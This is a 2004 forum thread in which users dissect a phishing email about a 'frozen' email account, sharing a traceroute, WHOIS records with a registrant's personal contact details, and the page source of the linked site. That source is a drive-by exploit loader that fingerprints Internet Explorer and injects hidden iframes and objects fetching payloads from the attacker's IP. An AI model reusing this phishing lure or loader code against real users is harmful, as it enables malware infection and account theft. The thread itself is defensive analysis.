Post #151,715
4/19/04 12:56:59 AM
4/19/04 12:58:21 AM
|
A sneaky Spam just received
Subject: Your email account frozen! Mime-Version: 1.0 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Status:
<HTML> <BODY> Good day,<BR><BR>
Our e-mail service was unavalaible April 17 at 5.00am - 8.00am.<BR> After this problem your e-mail account was frozen(you can`t send or receive messages),<BR> to re-activate e-mail click <A href="http://161.58.140.37/">here</a><BR><BR> <BR>
- -<BR> Sincerely,<BR> E-mail Admin.<BR>
</BODY> </HTML>
************************************************************************* If anyone can pinpoint that ip address of this I would be interested to hear the results (is usually a waste of time trying to tracerte it from here).
Doug Marker
Edited by dmarker
April 19, 2004, 12:58:21 AM EDT
A sneaky Spam just received
Subject: Your email account frozen! Mime-Version: 1.0 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Status:
<HTML> <BODY> Good day,
Our e-mail service was unavalaible April 17 at 5.00am - 8.00am.
After this problem your e-mail account was frozen(you can`t send or receive messages),
to re-activate e-mail click [link|http://161.58.140.37/|here]
- -
Sincerely,
E-mail Admin.
</BODY> </HTML>
************************************************************************* If anyone can pinpoint that ip address of this I would be interested to hear the results (is usually a waste of time trying to tracerte it from here).
Doug Marker
Edited by dmarker
April 19, 2004, 12:58:21 AM EDT
|
Post #151,733
4/19/04 8:32:35 AM
|
Re: A sneaky Spam just received
From a Winblows box: Tracing route to www.sienestr.com [161.58.140.37]\nover a maximum of 30 hops:\n\n 1 2 ms 1 ms 2 ms c-24-16-231-252.client.comcast.net [24.16.231.252] \n 2 * * * Request timed out.\n 3 10 ms 11 ms 16 ms 12.244.21.145 \n 4 11 ms 11 ms 13 ms 12.244.72.18 \n 5 12 ms 23 ms 11 ms tbr1-p012402.st6wa.ip.att.net [12.122.5.174] \n 6 31 ms 32 ms 28 ms tbr2-cl1.sffca.ip.att.net [12.122.12.113] \n 7 26 ms 26 ms 30 ms ggr2-p390.sffca.ip.att.net [12.123.13.194] \n 8 28 ms 28 ms 28 ms p16-0-1-1.r20.plalca01.us.bb.verio.net [129.250.9.73] \n 9 83 ms 83 ms 83 ms p16-0-1-3.r21.asbnva01.us.bb.verio.net [129.250.2.193] \n 10 92 ms 84 ms 81 ms p64-0-0-0.r20.asbnva01.us.bb.verio.net [129.250.2.34] \n 11 94 ms 86 ms 86 ms ge-0-0-0.r00.stngva01.us.wh.verio.net [129.250.27.187] \n 12 83 ms 85 ms 81 ms 204.2.125.106 \n 13 84 ms 84 ms 87 ms www.sienestr.com [161.58.140.37] \n\nTrace complete.
Nobody wins in a butter eating contest
|
Post #151,735
4/19/04 8:52:44 AM
|
More info
Domain Name.......... sienestr.com Creation Date........ 2004-04-17 Registration Date.... 2004-04-17 Expiry Date.......... 2014-04-17 Organisation Name.... Toofy company Organisation Address. 1840 Mt Ephraim Rd Organisation Address. Organisation Address. Adamstown Organisation Address. 21710 Organisation Address. MD Organisation Address. UNITED STATES Admin Name........... David Toof Admin Address........ 1840 Mt Ephraim Rd Admin Address........ Admin Address........ Adamstown Admin Address........ 21710 Admin Address........ MD Admin Address........ UNITED STATES Admin Email.......... dave_toof@yahoo.com Admin Phone.......... (301)8745311 Admin Fax............ Tech Name............ Verio Hostmaster Tech Address......... 5050 Blue Lake Dr. Tech Address......... Tech Address......... Boca Raton Tech Address......... 33431 Tech Address......... FL Tech Address......... UNITED STATES Tech Email........... hostmaster@VERIO-HOSTING.COM Tech Phone........... 888-663-6648 Tech Fax............. Name Server.......... ns19a.nameservers.net Name Server.......... ns19b.nameservers.net
|
Post #151,845
4/19/04 6:29:57 PM
|
Was anyone game to vistit the site with a browser :-)
I used 1 machine to access the web server but immediately got a message 'loading' in the middle of the screen & killed it.
Didn't have the time & wasn't prepared enough for evaluating the damage the site might be up to. My guess is it would be a spyware site that loads (if it can) spyware.
Later tonight I might do a controlled experiment using a Virtual PC & will let you know what transpires.
Doug M
|
Post #151,847
4/19/04 6:41:40 PM
|
I did.
Mozilla on Linux - just said that 'my account' was restored.
Imric's Tips for Living
- Paranoia Is a Survival Trait
- Pessimists are never disappointed - but sometimes, if they are very lucky, they can be pleasantly surprised...
- Even though everyone is out to get you, it doesn't matter unless you let them win.
|
Nothing is as simple as it seems in the beginning, As hopeless as it seems in the middle, Or as finished as it seems in the end.
|
|
Post #151,848
4/19/04 6:47:06 PM
|
Page source for main page:
<HTML xmlns:IE>\n<TITLE>Loading...</TITLE>\n <HEAD>\n <STYLE type='text/css'>\n IE:clientCaps {behavior:url(#default#clientcaps)}\n </STYLE>\n \n <SCRIPT language="JavaScript">\n\n function GetVersion(CLSID)\n {\n if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")) \n {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");} \n else \n {return Array(0,0,0,0);}\n }\n </SCRIPT> \n<meta http-equiv="refresh" content="3; url=thx.html"> \n </HEAD>\n<BODY>\n [image|http://161.58.140.37/cgi-local/userstat.cgi|||1|1]\n <IE:clientCaps ID="oClientCaps" />\n\n <SCRIPT language="JavaScript">\n if (navigator.appName=="Microsoft Internet Explorer")\n {\n var IEversion=navigator.appVersion;\n var IEplatform=navigator.platform;\n if (IEplatform.search("Win32") != -1)\n {\n if (IEversion.search("MSIE 5.0") != -1)\n {\n document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');\n }\n if (IEversion.search("MSIE 5.5") != -1)\n {\n document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>');\n }\n if (IEversion.search("MSIE 6.0") != -1)\n {\n var Version_IE = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");\n PatchList = clientInformation.appMinorVersion;\n document.write('<iframe src="[link|http://161.58.140.37/cgi-local/ie.cgi?vers='+Version_IE+PatchList+'|http://161.58.140.37...on_IE+PatchList+']"style="display:none"></iframe>');\n document.write('<object data="[link|http://161.58.140.37/cgi-local/htmlhelp.cgi|http://161.58.140.37...ocal/htmlhelp.cgi]" style="display:none"></object>'); \n \n }\n }\n }\n \n </SCRIPT>\n<BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><H2>\n<CENTER>\n<B>Loading....</B></CENTER></H2>\n \n</BODY>\n</HTML>
Nobody wins in a butter eating contest
|
Post #151,850
4/19/04 6:49:59 PM
|
HTML help exploit?
Looks like it is trying to take advantage of one of the many local execution errors common in IE - does not appear to do anything to Mozilla.
Nobody wins in a butter eating contest
|
Post #151,849
4/19/04 6:48:28 PM
|
Page source for thx.html
<HTML>\n<TITLE>Thank you!</TITLE>\n <HEAD>\n <STYLE type='text/css'>\n IE:clientCaps {behavior:url(#default#clientcaps)}\n </STYLE>\n </HEAD>\n<BODY>\n <BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>\n<CENTER><B>Thank you!<BR><BR>\nNow your e-mail account re-activated!<BR>\n\nSincerely,<BR>\nE-mail Admin.<BR>\n</B></CENTER>\n\n \n</BODY>\n</HTML>
Nobody wins in a butter eating contest
|